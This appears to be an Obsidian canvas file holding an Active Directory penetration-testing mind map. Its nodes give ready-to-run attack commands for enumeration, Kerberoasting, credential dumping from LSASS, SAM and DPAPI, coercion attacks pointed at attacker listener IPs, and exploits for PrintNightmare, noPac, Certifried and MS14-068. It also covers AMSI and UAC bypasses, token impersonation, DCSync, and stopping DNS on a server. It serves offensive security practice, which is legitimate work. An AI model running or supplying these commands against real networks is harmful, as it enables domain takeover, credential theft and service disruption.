{"type":"text","text":"```bash\ncrackmapexec smb -u <user> -p '<pass>' $ip --local-auth\n```","id":"86de9d718bb06043","x":10779,"y":-6094,"width":563,"height":72},
{"type":"text","text":"Overpass the hash / pass the key (PTK)","id":"ddb0ab1a445c42e1","x":10789,"y":-3218,"width":216,"height":65,"color":"#8e5757"},
{"type":"text","text":"!! Pass the hash (PTH)","id":"25c280082b36cdae","x":10746,"y":-4208,"width":216,"height":50,"color":"#8e5757"},
{"type":"text","text":"Pass the ticket \n(ccache / kirbi)","id":"a595e416716970ac","x":10746,"y":-2746,"width":159,"height":60},
{"type":"text","text":"```powershell\nGet-SQLServerLinkCrawl -username <user> -password <pass> -Verbose -Instance <sql_instance< -Query \"<query>\"\n```","id":"e8f95b6233867d5e","x":11035,"y":-6731,"width":929,"height":60},
{"type":"text","text":"```metasploit\nuse exploit/windows/mssql/mssql_linkcrawler\n```","id":"f3d75d2e1fbe134a","x":11035,"y":-6643,"width":929,"height":60},
{"type":"text","text":"aesKey","id":"fd356f2670bbd9eb","x":10746,"y":-2397,"width":159,"height":60},
{"type":"text","text":"```metasploit\nuse post/windows/gather/credentials/enum_laps\n```","id":"d4918e944ff5f2a1","x":7205,"y":1066,"width":835,"height":50},
{"type":"text","text":"```bloodhound\nMATCH (gr:Group), (gp:GPO), p=((gr)-[:GenericWrite]->(gp)) RETURN p\n```","id":"d35fa121a3040e55","x":7205,"y":1159,"width":628,"height":60},
{"type":"text","text":"On Computer","id":"e5407eac9bc46b10","x":6942,"y":-93,"width":149,"height":50},
{"type":"text","text":"dcsync","id":"495dd10df6c5f6f8","x":6942,"y":-1087,"width":117,"height":60},
{"type":"text","text":"Administrators, Domain Admins, or Enterprise Asmins as well as DOmain Controller computer accounts","id":"fd9265c1bcf8dcca","x":7131,"y":-1193,"width":456,"height":66},
{"type":"text","text":"GPO","id":"f9f4e5b1f9af7e93","x":6942,"y":1304,"width":149,"height":66},
{"type":"text","text":"Generic Write on GPO","id":"942c805d41a8e1b2","x":7205,"y":1478,"width":199,"height":50},
{"type":"text","text":"Abuse GPO","id":"1f3a1c988b9baec5","x":7454,"y":1478,"width":123,"height":50},
{"type":"text","text":"Return the principals that can write to the GP-Link attribute on OUs","id":"accf810a1ea99e17","x":7205,"y":1370,"width":372,"height":73},
{"type":"text","text":"```powerview\nGet-DomainObjectAcl -SearchBase \"CN=Policies, CN=System,DC=<BLAH>,DC=com\" - ResolveGUIDs | ? {$_.ObjectAceType -eq \"Group-Policy-Container\"}|select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl\n```","id":"2c0599ef2693c12f","x":7620,"y":1254,"width":835,"height":83},
{"type":"text","text":"SID of principals that can create new GPOs in the domain","id":"dd031fe7b7081fe4","x":7204,"y":1254,"width":373,"height":83},
{"type":"text","text":"```cmd\nsc \\\\DNSServer stop dns\n```","id":"1315ed8e55982c17","x":7852,"y":1653,"width":252,"height":60},
{"type":"text","text":"Impersonate RDP Session","id":"a8eac6e596715999","x":6633,"y":-1904,"width":240,"height":60},
{"type":"text","text":"```powershell\npsexec -s -i cmd\n```","id":"51f7e1f87ef617b0","x":6935,"y":-1904,"width":250,"height":60},
{"type":"text","text":"Hybrid-Environment (Azure AD Connect)","id":"1c1fc232b50fa754","x":6633,"y":-1765,"width":353,"height":60,"color":"#930e93"},
{"type":"text","text":"Dump cleartext password of MSOL Account on AAD Connect server","id":"41bc01bd5628ca29","x":7085,"y":-1765,"width":576,"height":60},
{"type":"text","text":"```powershell\npsexec -s -i cmd\n```","id":"29bf7eb186745c64","x":7248,"y":-1904,"width":250,"height":60},
{"type":"text","text":"ACLs / ACEs\npermissions","id":"a6821170d323adcf","x":6639,"y":332,"width":140,"height":70,"color":"#001eff"},
{"type":"text","text":"Admin","id":"b417564024ee94bf","x":8152,"y":878,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Domain Admin","id":"fd67eaeab0da5a6b","x":8317,"y":-1127,"width":146,"height":55,"color":"1"},
{"type":"text","text":"Lateral move","id":"dfff0a7f916aa291","x":8317,"y":-1052,"width":146,"height":50,"color":"#484e7f"},
{"type":"text","text":"Hash found (TGS)","id":"538fb8aed3603db3","x":8353,"y":145,"width":201,"height":50,"color":"2"},
{"type":"text","text":"```cmd\nsharphound.exe -c all -d <domain>\n```","id":"210d0bc441d0c404","x":4961,"y":-320,"width":592,"height":50},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p '<password>' -M slinky -o NAME=<filename> SERVER=$ip\n```","id":"21335faace676220","x":5051,"y":-811,"width":592,"height":80},
{"type":"text","text":"```bash\ndrop .url file\n```","id":"567e213b829b1bf5","x":5051,"y":-701,"width":592,"height":50},
{"type":"text","text":"```powershell\nImport-Module sharphound.ps1;invoke-bloodhound -collectionmethod all -domain <domain>\n```","id":"d712cddb79f5daad","x":4961,"y":-414,"width":739,"height":50},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p '<password>' --shares\n```","id":"e9fec7d73e17b861","x":5051,"y":-893,"width":592,"height":50},
{"type":"text","text":"```bash\nGetADUsers.py -all -dc-ip <dc_ip> <domain>/<username>\n```","id":"48390cd76de4c8ce","x":5051,"y":-1075,"width":592,"height":50},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p '<password>' --users\n```","id":"eac79059a8896e21","x":5051,"y":-975,"width":592,"height":50},
{"type":"text","text":"```bash\nbloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all\n```","id":"693cb542043a3d6b","x":4961,"y":-604,"width":739,"height":50},
{"type":"text","text":"```bash\n./rusthound -d <domain_to_enum> -u '<user>@<domain>' -p '<password>' -o <outfile> -z\n```","id":"c5bec97f4c38feef","x":4961,"y":-509,"width":739,"height":50},
{"type":"text","text":"Enum DNS","id":"e7df2ef334c93663","x":4715,"y":698,"width":250,"height":50},
{"type":"text","text":"Webdav","id":"ea2b13b2cf5784a4","x":4968,"y":1000,"width":125,"height":60},
{"type":"text","text":"```bash \nPetitPotam.py -d <domain> -u <user> -p <password> -l <listener_ip> <target_ip>\n```","id":"04d97327d7c73733","x":4965,"y":1261,"width":680,"height":50},
{"type":"text","text":"Known vulnerabilities","id":"c6386ba4451b6070","x":4920,"y":1407,"width":193,"height":60,"color":"#7c0404"},
{"type":"text","text":"```bash \nrcpdump.py <domain>/<user>:<password>@<domain_server> | grep MS-RPRN\n```","id":"fbc9668d415690e7","x":4965,"y":1189,"width":623,"height":50},
{"type":"text","text":"```powershell\nadPeas\n```","id":"f4b7cb302e08d40c","x":4715,"y":-30,"width":250,"height":60},
{"type":"text","text":"```powershell\npingcastle\n```","id":"d40599ab86a34af9","x":4715,"y":64,"width":250,"height":60},
{"type":"text","text":"```bash \ncoercer.py -u <user> -d <domain> -p <password> -t <target> -l <attacker_ip>\n```","id":"76968ff7c4881314","x":4965,"y":1330,"width":680,"height":50},
{"type":"text","text":"Exploit !","id":"201c47a4c3c1310e","x":4737,"y":1407,"width":109,"height":60},
{"type":"text","text":"Coerce","id":"ad797d42e76044db","x":4715,"y":1110,"width":125,"height":60},
{"type":"text","text":"```bash\ncertipy find -u <user>@<domain> -p <password> -dc-ip <domaincontroller>\n```","id":"17aa8e4de99006a9","x":5028,"y":814,"width":631,"height":50},
{"type":"text","text":"```bash\ndnstool.py -i 'DOMAIN\\user' -p 'password' --record '*' --action query <dc_ip>\n```","id":"9d40032899213895","x":5028,"y":698,"width":698,"height":50},
{"type":"text","text":"Kerberoasting","id":"97e059287fefafc0","x":4711,"y":415,"width":149,"height":60,"color":"#37ff00"},
{"type":"text","text":"Enumerate AD CS","id":"bd373b59a3c9fe7f","x":4715,"y":814,"width":250,"height":50},
{"type":"text","text":"Connect to computer","id":"fc51fd279ea01784","x":4731,"y":1521,"width":250,"height":60},
{"type":"text","text":"Got account on the domain authenticated\n(Cleartext pass / kerberos / NTLM)","id":"4a32fa4a12e9ecbd","x":4200,"y":258,"width":296,"height":85,"color":"#37ff00"},
{"type":"text","text":"Exploit SMB share","id":"4e7bebca0269d15f","x":4711,"y":-761,"width":250,"height":60},
{"type":"text","text":"Get kerberoastable users","id":"20bf9bcc287fbad1","x":4923,"y":282,"width":250,"height":50},
{"type":"text","text":"Get hash","id":"a5e1aefe48a38778","x":4923,"y":496,"width":107,"height":50},
{"type":"text","text":"```cmd\nmimikatz.exe \"sekurlsa::dpapi\"\n```","id":"9054bfb1d2dbec7e","x":6967,"y":-3038,"width":436,"height":50},
{"type":"text","text":"```bash\nsecretsdump.py <domain</<user>:<password>@$ip\n```","id":"ef5b4dda43ab96a2","x":6967,"y":-2965,"width":436,"height":50},
{"type":"text","text":"```cmd\nfindstr /si 'password' *.txt *.xml *.docx *.xlsx *.config\n```","id":"62fa8969e987869a","x":6967,"y":-2852,"width":534,"height":50},
{"type":"text","text":"```cmd\n%appdata%\\Local\\Google\\Chrome\\User Data\\Default\n```\n\n//Location","id":"2a7dcf67134e981b","x":6799,"y":-2649,"width":449,"height":109},
{"type":"text","text":"```cmd\nlazagne.exe all\n```","id":"298420a72820fc58","x":6967,"y":-2745,"width":534,"height":50},
{"type":"text","text":"```powershell\nPowerview\n```","id":"349cc5c5e2a09153","x":4715,"y":-124,"width":250,"height":60},
{"type":"text","text":"**1) Get all users**","id":"b82ed74f2a3248f9","x":4715,"y":-1029,"width":250,"height":60,"color":"1"},
{"type":"text","text":"Bloodhound","id":"202fc757906aeeca","x":4711,"y":-459,"width":129,"height":60,"color":"#37ff00"},
{"type":"text","text":"Enumerate SMB share","id":"f0165800d0dd62ab","x":4719,"y":-898,"width":250,"height":60},
{"type":"text","text":"```powershell\nSharpview\n```","id":"f76af5e657d61b16","x":4715,"y":-218,"width":250,"height":60},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p <password> -M impersonate\n```","id":"28c3017681173290","x":6935,"y":-2298,"width":576,"height":60},
{"type":"text","text":"```cmd\nirs.exe exec --pid <pid> --command <command>\n```","id":"5a9eb9aa1dc3dfce","x":7280,"y":-2204,"width":459,"height":60},
{"type":"text","text":"chrome","id":"74b21754ed5db30d","x":6633,"y":-2624,"width":107,"height":60},
{"type":"text","text":"dpapi extract","id":"359ae089bfef4403","x":6633,"y":-3038,"width":213,"height":50},
{"type":"text","text":"Token manipulation","id":"d7ed9114bc84b8b4","x":6633,"y":-2298,"width":195,"height":60},
{"type":"text","text":"```cmd\nirs.exe list\n```","id":"fd387eb1532418de","x":6935,"y":-2204,"width":250,"height":60},
{"type":"text","text":"```cmd\n.\\incognito.exe list_tokens -u\n```","id":"31462b17822dccbf","x":6935,"y":-2482,"width":313,"height":50},
{"type":"text","text":"```metasploit\nuse incognito\n```","id":"2780e19731eef160","x":6935,"y":-2399,"width":190,"height":50},
{"type":"text","text":"Search password files","id":"ccf6823f13ae7eeb","x":6633,"y":-2857,"width":250,"height":60},
{"type":"text","text":"```bash\nDonPAPI.py <domain</<user>:<password>@$ip\n```","id":"92f8ef21c3616dcf","x":6967,"y":-3105,"width":436,"height":50},
{"type":"text","text":"Search stored password","id":"5d7961633b9beb2a","x":6633,"y":-2750,"width":250,"height":60},
{"type":"text","text":"Extract credentials with certificate authentication (ADCS required)","id":"acb385e56a734e15","x":6935,"y":-2114,"width":320,"height":84},
{"type":"text","text":"Extract credentials from LSA","id":"833bd1320d312c3e","x":6633,"y":-3304,"width":213,"height":90},
{"type":"text","text":"Extract credentials from SAM","id":"a84da1fe4186ef38","x":6633,"y":-3827,"width":213,"height":90},
{"type":"text","text":"Extract credentials from LSASS","id":"6f61c42f74075d22","x":6633,"y":-4448,"width":213,"height":90},
{"type":"text","text":"```bash\ncertipy shadow auto -u '<machine>$'@<domain> -k account '<machine$>'\n```","id":"4df42e76c29602fc","x":3899,"y":-4367,"width":338,"height":121},
{"type":"text","text":"cert potatoes","id":"38e1d4d3f4a06c7f","x":2797,"y":-4525,"width":236,"height":50,"color":"#7c0404"},
{"type":"text","text":"```bash\ncertipy req -k -ca <ca> -template Machine -target <dc>\n```","id":"04c8f5102dd30f20","x":3664,"y":-4494,"width":338,"height":60},
{"type":"text","text":"Shadow credentials","id":"efca47e482aad3a7","x":3664,"y":-4331,"width":190,"height":50},
{"type":"text","text":"Certpotato","id":"93600d5100453ad6","x":2797,"y":-4437,"width":236,"height":50,"color":"#7c0404"},
{"type":"text","text":"TGT (Pass the ticket)","id":"c1700908cee604a7","x":3404,"y":-4437,"width":188,"height":50,"color":"#484e7f"},
{"type":"text","text":"```powershell\n./Rubeus tgtdeleg /nowrap\n```","id":"50ed9c1454364ded","x":3091,"y":-4434,"width":274,"height":45},
{"type":"text","text":"WSReset","id":"6e273994cfa4c46e","x":2833,"y":-5128,"width":151,"height":50},
{"type":"text","text":"MSDT","id":"e0c8beac6517db86","x":2833,"y":-5058,"width":151,"height":50},
{"type":"text","text":"eventvwr","id":"8d32426c188309be","x":2833,"y":-4988,"width":151,"height":60},
{"type":"text","text":"```bash\ncertipy auth -pfx <pfxfile>\n```","id":"825f23809396faad","x":4029,"y":-4494,"width":338,"height":60},
{"type":"text","text":"FodHelper","id":"f721b4bc578621e9","x":2833,"y":-5198,"width":151,"height":50},
{"type":"text","text":"```cmd\nmshta.exe my.hta\n```","id":"97fd1ad2dd7449cc","x":2826,"y":-5573,"width":203,"height":61},
{"type":"text","text":"MSBuild","id":"214c90e43bf45ac6","x":2826,"y":-5485,"width":118,"height":50},
{"type":"text","text":"AppLocker (whitelisting) bypass","id":"90f8d5ec0dd78f02","x":2474,"y":-5637,"width":250,"height":60},
{"type":"text","text":"KrbRelayUp","id":"252cf854ed432cca","x":2474,"y":-5329,"width":146,"height":60},
{"type":"text","text":"Servce account (IIS/Mssql) \n(got SEImpersonate)","id":"7c84817c8a5933a4","x":2477,"y":-4609,"width":250,"height":60},
{"type":"text","text":"PrintSpoofer","id":"86584cd98e56428e","x":2797,"y":-4604,"width":236,"height":50,"color":"#7c0404"},
{"type":"text","text":"...","id":"e926fb5441790625","x":2513,"y":-4095,"width":71,"height":60},
{"type":"text","text":"RoguePotato","id":"49e3136702deb26c","x":2797,"y":-4749,"width":236,"height":50,"color":"#7c0404"},
{"type":"text","text":"```bash\nticketer.py -nthash <hash> -domain-sid <domain_sid> -domain <domain> -spn cifs/<dc> <targetUser>\n```","id":"26551b6dd6d2654b","x":4759,"y":-4469,"width":338,"height":121},
{"type":"text","text":"Machine NT Hash","id":"8df1831087bbc554","x":4487,"y":-4434,"width":188,"height":50,"color":"#484e7f"},
{"type":"text","text":"Admin access","id":"586fe310432cd4cf","x":4999,"y":-4897,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Juicy Potato / Lovely Potato","id":"d4141d1c7cc59bec","x":2797,"y":-4676,"width":236,"height":50,"color":"#7c0404"},
{"type":"text","text":"Reflection method","id":"0fb7e603b50bcb1e","x":2794,"y":-6095,"width":250,"height":60},
{"type":"text","text":"AMSI bypass","id":"781a732b4006a571","x":2475,"y":-6095,"width":250,"height":60},
{"type":"text","text":"Patching amsi.dll","id":"45cf463f4e51484f","x":2798,"y":-6013,"width":250,"height":60},
{"type":"text","text":"```cmd\nfindstr /si password *.xml *.ini *.txt *.config *.docx *.xlsx *.log *.ps1\n```","id":"da6b36e0f524b2d5","x":2776,"y":-5923,"width":584,"height":83},
{"type":"text","text":"SMBGhost CVE-2020-0796","id":"e3f5a90961e660e9","x":2477,"y":-4900,"width":250,"height":55,"color":"#7c0404"},
{"type":"text","text":"CVE-2021-36934 (HiveNightmare/SeriousSAM)","id":"a23a0b600c29a8b1","x":2477,"y":-4823,"width":250,"height":74,"color":"#7c0404"},
{"type":"text","text":"User Access Control (UAC) bypass","id":"60f9b0d9a4fe90ea","x":2477,"y":-5093,"width":250,"height":60},
{"type":"text","text":"```powershell\nGet-Childitem -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\SrpV2\\Exe (dll/msi/...)\n```","id":"90405f92b146e87a","x":2794,"y":-6387,"width":780,"height":60},
{"type":"text","text":"```powershell\ninstallutil.exe /lofile= /LogToConsole=false /U C:\\runme.exe\n```","id":"bf342f20156dffc9","x":3108,"y":-5822,"width":450,"height":75},
{"type":"text","text":"Low Access","id":"52ba67c5164218f2","x":2059,"y":-5329,"width":250,"height":60,"color":"#969292"},
{"type":"text","text":"```cmd\nwinpeas.exe\n```","id":"c3d50d1fd6e636c8","x":2475,"y":-6261,"width":250,"height":60},
{"type":"text","text":"Get Applocker info","id":"348477c502851715","x":2474,"y":-6387,"width":250,"height":60},
{"type":"text","text":"```powershell\n.\\KrbRelayUp.exe relay -Domain <domain> -CreateNewComputerAccount -ComputerName <Computer$> -ComputerPassword <password>\n```","id":"b87f341277c9384b","x":2690,"y":-5342,"width":592,"height":86},
{"type":"text","text":"Low access \n(without applocker)","id":"826eb4cf6a2dad98","x":3765,"y":-5657,"width":250,"height":60,"color":"#969292"},
{"type":"text","text":"Powershell CLM bypass","id":"3e98f47ee3c00a12","x":2828,"y":-5810,"width":232,"height":50},
{"type":"text","text":"Use `C:\\Windows\\Tasks`","id":"add282f61259abd3","x":2826,"y":-5735,"width":225,"height":50},
{"type":"text","text":"https://amsi.fail/","id":"b3b3841401bd9741","x":2798,"y":-6176,"width":250,"height":60},
{"type":"text","text":"```bash\ncertipy req -u 'certifriedpc$'@<domain> -p 'certifriedpass' -target <ca_fqdn> -ca <ca_name> -template Machine\n```","id":"900021c932dad836","x":3146,"y":-2470,"width":470,"height":118},
{"type":"text","text":"```bash\nCVE-2021-1675.py <domain>/<user>:<password>@<target> '\\\\<smb_server_ip>\\<share>\\inject.dll'\n```","id":"dd6a4e216b3c052d","x":2726,"y":-2591,"width":811,"height":60},
{"type":"text","text":"DCSYNC","id":"d9d5d767b1571989","x":4450,"y":-2440,"width":250,"height":60},
{"type":"text","text":"Delete computer","id":"76d1fa388165d915","x":5060,"y":-2440,"width":250,"height":60},
{"type":"text","text":"Admin","id":"4caa85cf1f4d63e7","x":3601,"y":-2591,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"DOM ADMIN","id":"55d4155fd991c8ce","x":4749,"y":-2440,"width":250,"height":60,"color":"1"},
{"type":"text","text":"Pass the ticket","id":"45e6a7d47aedd2bc","x":4149,"y":-2441,"width":250,"height":60},
{"type":"text","text":"```bash\ncertipy auth -pfx <pfx_file> -username '<dc>$' -domain <domain> -dc-ip <dc_ip>\n```","id":"f7ade2460b50b60d","x":3661,"y":-2452,"width":427,"height":83},
{"type":"text","text":"```powershell\n.\\KrbRelayUp.exe spawn -m rbcd -d <domain> -dc <dc> -cn <computer_name> -cp <computer_pass>\n```","id":"4cde0818baf9b297","x":3354,"y":-5342,"width":465,"height":86},
{"type":"text","text":"Use `C:\\Windows\\Temp`","id":"2799851098c46683","x":2828,"y":-5647,"width":225,"height":50},
{"type":"text","text":"privexchange \n(CVE-2019-0724, CVE-2019-0686)","id":"2954d0268333c398","x":2362,"y":-3190,"width":302,"height":68,"color":"#7c0404"},
{"type":"text","text":"PrintNightmare\nCVE-2021-1675 / CVE-2021-34527","id":"3df5ec213f4e4d31","x":2362,"y":-2594,"width":302,"height":65,"color":"#7c0404"},
{"type":"text","text":"DCSYNC","id":"4a74566f32187f41","x":3628,"y":-2809,"width":250,"height":60},
{"type":"text","text":"Domain Admin","id":"1b349f6d8a919d39","x":3802,"y":-3141,"width":250,"height":60,"color":"1"},
{"type":"text","text":"DOM ADMIN","id":"8185244e7549886a","x":3927,"y":-2809,"width":250,"height":60},
{"type":"text","text":"Delete computer","id":"21219c31e4b16d27","x":4230,"y":-2809,"width":250,"height":60},
{"type":"text","text":"Pass the ticket","id":"930c56a7e17afe85","x":3327,"y":-2810,"width":250,"height":60},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p <passwor> -M nopac\n```","id":"d2827cc36e06a5e8","x":2788,"y":-3021,"width":485,"height":50},
{"type":"text","text":"```powershell\n.\\noPac.exe -domain <domain< -user <user> -pass <pass> /dc <dc_fqdn> /mAccount <machine_account> /mPassword <machine_pass> /service cifs /ptt\n```","id":"c10ff3135712ac39","x":2788,"y":-2937,"width":387,"height":140},
{"type":"text","text":"With impacket\n```bash\naddcomputer.py / addspn.py / renameMachine.py / getTGT.py / renameMachine.py / getST.py \n```","id":"825683f4e54297d3","x":2788,"y":-2755,"width":387,"height":140},
{"type":"text","text":"```bash\ncertipy account create -u <user>@<domain> -p '<password>'-user 'certifriedpc'-pass 'certifriedpass' -dns '<FQDN_DC>'\n```","id":"af61c9a09d5951a6","x":2664,"y":-2470,"width":440,"height":118},
{"type":"text","text":"Certifried\nCVE-2022-26923 (need ADCS)","id":"b4150b270f77c0dc","x":2362,"y":-2450,"width":262,"height":79,"color":"#7c0404"},
{"type":"text","text":"Admin","id":"3412e1b5cb3186bc","x":3802,"y":-3245,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Pass the ticket","id":"6e7f1ca24ed168b2","x":3753,"y":-3385,"width":250,"height":60},
{"type":"text","text":"Admin","id":"b4e3a3c44a6dd80d","x":4362,"y":-3445,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Domain Admin","id":"3b202c61edbb1b72","x":4362,"y":-3341,"width":250,"height":60,"color":"1"},
{"type":"text","text":"Result / Go to","id":"a36343bb92eb2b78","x":4095,"y":-3385,"width":164,"height":60},
{"type":"text","text":"```bash\nrpcclient $> lookupnames <name> wmic useraccount get name, sid\n```\n\n```metasploit\nauxiliary/admin/kerberos/ms14_068_kerberos_checksum\n```","id":"507cfc0dda48e9f3","x":3022,"y":-3442,"width":595,"height":131},
{"type":"text","text":"SamEccountName / nopac\nCVE-2021-42284 / CVE-2021-42278","id":"197a860c1e209b1d","x":2362,"y":-2871,"width":302,"height":74,"color":"#7c0404"},
{"type":"text","text":"MS14-068","id":"4bb9007e12d19813","x":2362,"y":-3371,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p <password> -M drop-sc\n```","id":"ddc779ce510c7a42","x":5824,"y":1025,"width":493,"height":60},
{"type":"text","text":"```bash \nprinterbug.py '<domain>/<username>:<password>'@<Printer_ip> <listener_ip>\n```","id":"6814d7426a33197c","x":5645,"y":1178,"width":390,"height":72},
{"type":"text","text":"Coerce HTTP =>","id":"abb1edf4a12e2f1a","x":6149,"y":1085,"width":168,"height":60,"color":"3"},
{"type":"text","text":"Result / Go to","id":"17d66accbb5f116a","x":3535,"y":-3185,"width":164,"height":60},
{"type":"text","text":"Coerce HTTP =>","id":"4a063d872d519421","x":3313,"y":-3185,"width":164,"height":60},
{"type":"text","text":"```bash\npython privexchange.py -ah <attacker_host_or_ip> <exchange_host> -u <user> -d <domain> -p <password>\n```","id":"944a22c82f0397bd","x":2732,"y":-3190,"width":500,"height":68},
{"type":"text","text":"```bash\nFindSMB2UPTime.py $ip\n```","id":"648b0e27f32e3915","x":2690,"y":-3370,"width":250,"height":60},
{"type":"text","text":"```bash\ngoldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>'@<target>\n```","id":"bc4c79ccc2a790ec","x":3023,"y":-3285,"width":594,"height":56},
{"type":"text","text":"Known vulnerabilities","id":"ae03adb4db1e63c1","x":2017,"y":-2870,"width":193,"height":60,"color":"#7c0404"},
{"type":"text","text":"```bloodhound\nMATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p\n```","id":"0b4ab5229b6fb93d","x":5309,"y":363,"width":784,"height":50},
{"type":"text","text":"Coerce SMB ->","id":"9134f59d6f989372","x":6132,"y":1251,"width":164,"height":60,"color":"3"},
{"type":"text","text":"Lateral move","id":"68b3e9c773637867","x":5113,"y":1519,"width":250,"height":60},
{"type":"text","text":"```bash\nGet-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName\n```","id":"fd21c9413f395315","x":5309,"y":207,"width":618,"height":54},
{"type":"text","text":"```bloodhound\nMATCH (u:User {hasspn:true}) RETURN u\n```","id":"67dc786a9714bdfe","x":5309,"y":282,"width":732,"height":50},
{"type":"text","text":"ADCS","id":"6b13c399f404e742","x":5742,"y":809,"width":98,"height":60},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p <password> -M webdav \n```\nFind","id":"81f53cff86f036fb","x":5241,"y":892,"width":605,"height":103},
{"type":"text","text":"Hash found (TGS)","id":"65c6886b82a2677d","x":5846,"y":491,"width":164,"height":60,"color":"2"},
{"type":"text","text":"Start webdav with Documents.searchConnector-ms file","id":"6b6a9a041f583d2d","x":5259,"y":1030,"width":532,"height":50},
{"type":"text","text":"Coerce with <attacker_hostname>@80 /Something as target","id":"29ebee457c0a21be","x":5259,"y":1090,"width":532,"height":50},
{"type":"text","text":"WriteProperty (Self-Membership)","id":"acce265249c2a9a8","x":7154,"y":-496,"width":311,"height":50},
{"type":"text","text":"Shadow Credentials\n(needs ADCS)","id":"2599fc752ab281df","x":7219,"y":-845,"width":180,"height":60},
{"type":"text","text":"WriteOwner on Group","id":"52ae7aee0e188ba3","x":7154,"y":-272,"width":196,"height":50},
{"type":"text","text":"WriteDACL + WriteOwner\nGive yourself Generic all","id":"2eecb0fbe88743b5","x":7385,"y":-293,"width":227,"height":93},
{"type":"text","text":"GenericAll/WriteProperty on Group","id":"15b5dbeccb68f639","x":7154,"y":-560,"width":311,"height":50},
{"type":"text","text":"GenericAl / GenericWrite","id":"ddb7c12133b27fc9","x":7154,"y":-93,"width":231,"height":50},
{"type":"text","text":"User with clear text pass","id":"fd5b5eb74c3794da","x":8223,"y":55,"width":260,"height":50,"color":"#37ff00"},
{"type":"text","text":"Scan network","id":"bd23c2ea8455d054","x":5803,"y":693,"width":250,"height":60,"color":"#f16fbb"},
{"type":"text","text":"```bash\nGetUserSPN.py -request -dc-ip <dc_ip> <domain>/<user>:<password>\n```","id":"1fddd6679e652d47","x":5105,"y":448,"width":618,"height":54},
{"type":"text","text":"```cmd\nRubeus.exe kerberoast\n```","id":"d677c05ca5847f5a","x":5105,"y":546,"width":250,"height":60},
{"type":"text","text":"Access","id":"3ed47201ac136a58","x":7639,"y":1478,"width":107,"height":50,"color":"#969292"},
{"type":"text","text":"```powerview\nGet-DomainOU|Get-DomainObjectAcl -ResolveGUIDs|?{$_.ObjectAceType -eq \"GP-Link\"-and $_.ActiveDirectoryRights -match \"WriteProperty\"}|select ObjectDN, SecurityIdentifier|fl\n```","id":"5a68e0ea14ed4ba4","x":7620,"y":1365,"width":835,"height":83},
{"type":"text","text":"```cmd\nsc \\\\DNSServer start dns\n```","id":"6efc07f8a965fa0a","x":8141,"y":1653,"width":278,"height":60},
{"type":"text","text":"Admin","id":"55d68cba1bac9660","x":8483,"y":1653,"width":98,"height":60,"color":"#ff00ff"},
{"type":"text","text":"ACL","id":"cc7929e3d7815c26","x":8390,"y":-521,"width":186,"height":50,"color":"#001eff"},
{"type":"text","text":"Crack hash","id":"fc10944f68425a74","x":8317,"y":-982,"width":146,"height":50,"color":"2"},
{"type":"text","text":"Lateral move PTC","id":"b55f8176b00b3182","x":8317,"y":-860,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"Coerce SMB ","id":"3c65d74f99afa252","x":5727,"y":-751,"width":167,"height":60,"color":"3"},
{"type":"text","text":"ACL","id":"c10330c70f1cd23f","x":6129,"y":-156,"width":164,"height":50,"color":"#31dbdd"},
{"type":"text","text":"Users","id":"8450ac62513edd50","x":5730,"y":-1025,"width":164,"height":50,"color":"#31dbdd"},
{"type":"text","text":"Self (Self-Membership) on Group","id":"77d1488e0e3f2dfe","x":7154,"y":-626,"width":311,"height":50},
{"type":"text","text":"Get LAPS passwords","id":"e2ad6cd89e56b299","x":6942,"y":879,"width":149,"height":66},
{"type":"text","text":"On user","id":"05c8f7cc8c95075b","x":6942,"y":282,"width":149,"height":50},
{"type":"text","text":"```cmd\nmimikatz.exe lsadump::dcsync /domain:<target_domain> /user:<target_domain>\\administrator\n```","id":"af7841cfbf9781a7","x":7131,"y":-1082,"width":867,"height":50},
{"type":"text","text":"```bash\nsecretsdump.py '<domain>'/'<user>':'<passwor>'@'<domain_controller>'\n```","id":"f5aabc5dfecc71a2","x":7131,"y":-992,"width":867,"height":50},
{"type":"text","text":"```bash\naclpwn.py\n```","id":"947c6f1bb71402ed","x":6942,"y":481,"width":257,"height":59},
{"type":"text","text":"Result / Go to","id":"39bd7e3018e6b6cd","x":5890,"y":-82,"width":151,"height":60},
{"type":"text","text":"Delegation","id":"2d1289f83f35a931","x":6129,"y":-77,"width":164,"height":50,"color":"#31dbdd"},
{"type":"text","text":"Users","id":"bf297551e8a02f7b","x":6129,"y":5,"width":164,"height":50,"color":"#31dbdd"},
{"type":"text","text":"Account","id":"c5904de5225c08ef","x":5730,"y":-893,"width":164,"height":50,"color":"#37ff00"},
{"type":"text","text":"```bash\nsecretsdump.py -system SYSTEM -sam SAMLOCAL\n```","id":"271ef3a8a2ead268","x":7671,"y":-3244,"width":451,"height":50},
{"type":"text","text":"Shadow copies","id":"00f9aed73ad4a16f","x":6987,"y":-3535,"width":173,"height":50},
{"type":"text","text":"```cmd\n.\\incognito.exe execute -c \"<domain>\\<user>\" powershell.exe\n```","id":"86f3669e25250e2f","x":7312,"y":-2482,"width":528,"height":50},
{"type":"text","text":"```metasploit\nimpersonate_token <domain>\\\\<user>\n```","id":"b150d2415099901a","x":7248,"y":-2399,"width":373,"height":50},
{"type":"text","text":"```bash\nsecretsdump.py <domain>/<user>:<password>@$ip\n```\n","id":"ab91478900e8d508","x":6987,"y":-3329,"width":468,"height":50},
{"type":"text","text":"```bash\nreg.py <domain>/<user>:<password>@$ip backup -o '\\\\<smb_ip>\\share'\n```\n","id":"b4ca0c95d6b4a64c","x":6984,"y":-3244,"width":592,"height":50},
